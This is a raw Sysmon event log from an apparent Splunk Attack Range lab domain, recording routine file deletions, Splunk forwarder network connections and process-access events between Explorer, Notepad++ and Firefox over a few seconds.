23542300x80000000000000001049086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.225{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A12799433F6E55C9954818E56C162A8E,SHA256=B8AF50D26ED7BCBF65FCE9154BA6D66B90949F32A6B5975D4994E25DA8D3B012,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.225{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A0F61F619B51637C2361AF1A9B02DA2F,SHA256=9180B8D95129CD8C7D3851505D4D216EAFBCC32D11AE83EF4EF184F6B06EF907,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7FCE117E723FE4FF2AC14476DF967D40,SHA256=1C08099191B7643FB4F27F710E80291D94DC805767D6C03DCAA0CA6AD11C8066,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=68F0D0884B87F5646C64D72A0DC0B642,SHA256=CEAF35C5B21ACA789EC1F26812257C3E2A22BB7BBC1761C804E3D50BF5F02328,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001049082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=98150A96FDE3CD501B715CC9BA7C4980,SHA256=5FD9BD773D20B8AEA0658A579449ACD86A81BEDEFC7A39619578A8870FF59F34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7D35C5264AA3E8636475655F58E2DB5E,SHA256=62853360D6E53C4BA67DDF762F9371C70892B1A6F6A0C4C8F4859D92B0E0933C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F8B0C0ADA99853F8F0A380476344D2A0,SHA256=880266F48C3EBAA5F9F436D4113D6441CBC81AC3B2D0A2A9C012FC0CE1449442,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8FE6ED969399119C77F1CB285EA64C0A,SHA256=4482FAAF18C733155BB87DB604A836D25FDC68D5A0D01247585348DFCC108ABA,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001049078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E04DBE4DC49266722081F3A1DB8BCDE1,SHA256=CF5191329D4A3E930E98670C05236F23E16D964715887A3A8285F1302229262F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2C8FB8458864FA89B940F184D5663F9C,SHA256=82DF1A8C5256F0BF929548196352FD9916CC4361A850E7035D2833D8F38E9537,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BE0E2683BD54C004BA8625C360E57D0C,SHA256=1382E32A185DCA9DBAD48C7AA998388B25FAE73989438CBBF78AE253D2C0438F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:55.179{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=418F6EF44BD4588AF2C7F2293B823B78,SHA256=4F761DE092C2D1FDBA92C8C62E5FB73F212D35E16F3C9203BD66695E33710165,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807676Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:56.806{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AE87C8E834B8B7D4FE985869B8E35CF,SHA256=920F278E27653204AB18891BFF77849CEFCC3241997F01A914A224CE1F8D95C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:56.994{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:56.195{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=530C6E270D9FDDB297E69C56AAA25C67,SHA256=77FEC44681C226F6623A441B5E7208D84092E8D7A6ED5A0E80942E8C9E9F3345,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807678Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:56.204{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57272-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807677Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:57.822{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A81171DA07D82F78692F66E3EBB75931,SHA256=E6FBB560B70675D3CE2BEBD504B26CA4E7A564A70CC3B64D0A69E0C9E833E200,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:57.209{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22708D8BDEB7029BE2F861403D112F60,SHA256=CAB3211A15A640A82CE54581C4E66A16622E9714A1FDECEBB9A54A24A1FD1D29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807679Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:58.822{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51F5606674F2A098A1112938B6C3C173,SHA256=42E2905D6033A5147912EF2F2D11C1F5FEBE218DECC0F64CCF49EADC70F8E4E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:58.224{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0236D501CEAB14921969B4746F9DC21,SHA256=3F755FC367CC76D77882778B24CF6588F4CCCC08C70683E515718D54068AD9A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:58.145{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf69f1ae.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:49.738{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51032-false10.0.1.12-8000- 23542300x8000000000000000807680Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:59.837{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99968ADA7C35E009BABE19BD4D2BD249,SHA256=9D09A56FDA55963C67C1B18B0E6E3EA1251EEEC321BA22DEF5CE963FC37183DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:59.224{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8E08BC1F9F2F40FAE3A0F01A6FD5AAC,SHA256=EBD0F10D5A70E2AF0A3F9FCB2DD061C7A35596E2779FB02BCBBE5BC3AD323760,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.521{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51033-false10.0.1.12-8089- 10341000x80000000000000001049100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:59.045{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:59.045{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:59.045{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:59.024{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:59.024{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:59.024{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:59.024{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807681Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:00.900{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5AFE784B1D057BC4EC381D0EE98F124,SHA256=BFD3078D42BD584C9EA38576A1D6B02DAEE894D75B2D485DE7B48F1A91F5F1BD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:00.646{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001049109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:00.646{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001049108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:00.646{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001049107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:00.646{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001049106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:00.646{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf69fb72.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:00.243{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91D9BDE04BCB008A8F5D5AEFF406F8E9,SHA256=5F77F396A6C60F2E4622DBD550F7D81FF35C3B3C8FE96BAAEB6E8241006B20F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.406{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51034-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001049103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:52.406{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51034-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 23542300x8000000000000000807682Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:01.900{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7081D0FF07BCB3BB9C2D605D8CFF44FE,SHA256=C781FB10C299355411E5DDEBFDF7B7B5DAB845E5B5E927CCD7C5A27412CDB201,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:01.277{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DB81EFB8A9A67056506F28F66428E73,SHA256=7511EFD609D9E15C3143E919004DDA932654709BF11DC8BD7AE1B00A86AD0C0E,IMPHASH=00000000000000000000000000000000falsetrue 
